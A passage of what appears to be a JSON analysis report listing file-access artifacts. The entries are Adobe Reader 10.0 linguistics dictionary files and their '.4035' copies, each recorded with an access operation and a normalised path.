10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw38.hsp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw38.hsp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw38.hsp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw38.hsp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw56.ths.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw56.ths.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw56.ths", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw56.ths", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn.fca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nyn.fca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn.fca", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nyn.fca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nyn.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nyn.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn16.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nyn16.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn16.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nyn16.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn47.hsp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nyn47.hsp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn47.hsp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nyn47.hsp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol.fca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\pol.fca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol.fca", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\pol.fca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\pol.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\pol.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol103.hsp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\pol103.hsp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol103.hsp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\pol103.hsp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\pol32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\pol32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt.fca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\prt.fca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt.fca", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\prt.fca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\prt.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\prt.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\prt32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\prt32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt39.hsp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\prt39.hsp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt39.hsp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\prt39.hsp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rum.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rum.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rum.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rum.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rum124.lex.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rum124.lex.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rum124.lex", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rum124.lex", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rum32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rum32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rum32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rum32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rumphon.env.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rumphon.env.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rumphon.env", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rumphon.env", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus.fca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rus.fca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus.fca", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rus.fca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rus.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rus.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus101.hsp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rus101.hsp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus101.hsp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rus101.hsp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rus32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rus32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr.fca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr.fca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr.fca", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr.fca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr105.hsp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr105.hsp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr105.hsp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr105.hsp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr96.ths.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr96.ths.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr96.ths", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr96.ths", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo.fca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slo.fca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo.fca", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slo.fca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slo.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slo.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo113.hsp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slo113.hsp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo113.hsp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slo113.hsp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slo32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slo32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slv.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slv.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slv.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slv.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slv137.lex.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slv137.lex.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slv137.lex", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slv137.lex", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slv32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slv32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slv32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slv32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slvphon.env.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slvphon.env.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slvphon.env", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slvphon.env", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn.fca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn.fca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn.fca", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn.fca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn24.hsp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn24.hsp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn24.hsp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn24.hsp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn62.ths.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn62.ths.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn62.ths", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn62.ths", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd.fca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd.fca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd.fca", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd.fca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": 